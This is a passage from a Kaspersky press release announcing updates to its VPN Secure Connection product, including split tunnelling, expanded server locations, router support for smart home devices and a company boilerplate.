Alongside the performance increase, the updated Kaspersky VPN Secure Connection’s split-tunnelling feature allows users to select exactly what traffic goes through the VPN. This will help to achieve better performance, letting the user prioritize high-bandwidth traffic, focus on data in sensitive apps, and disable the VPN for other apps that might be reliant on location data.

The geography of servers within Kaspersky VPN Secure Connection has also been greatly increased, now offering 86 locations across 68 regions. This lets users access a wider range of content on the biggest global streaming services, including Netflix, Hulu, Amazon Prime, HBO Max, Disney+ and BBC iPlayer. An intuitive new function of the VPN helps customers to pick the best location for a particular task by recommending the one that provides the best performance level for either streaming or torrenting.

Additionally, the VPN for routers now allows all devices connected to home Wi-Fi to run through the VPN automatically, without having to set up each one individually. This feature is particularly useful for smart TVs, smart locks, and other smart home gadgets, on which a user cannot install a VPN directly, therefore providing uninterrupted privacy and security to these devices.

“As people continue to work from home and spend more time online, an increased importance is placed on keeping their data private as well as securing connected home devices,” said Marina Titova, vice president, consumer product marketing at Kaspersky. “To support consumers with their needs, we’ve invested a lot into improvement of our Kaspersky VPN. As a result, consumers can experience boosted VPN tunnel performance, with a 200% increase compared to 2020. The VPN also sees new features and better UX to ensure speed, privacy and high performance across all home devices.”

The new Kaspersky VPN Secure Connection is available now. To find out more about the product, visit this page.

****About Kaspersky****

Kaspersky is a global cybersecurity and digital privacy company founded in 1997. Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative security solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection and a number of specialized security solutions and services to fight sophisticated and evolving digital threats. Over 400 million users are protected by Kaspersky technologies and we help 240,000 corporate clients protect what matters most to them. Learn more at usa.kaspersky.com.

Tag

#intel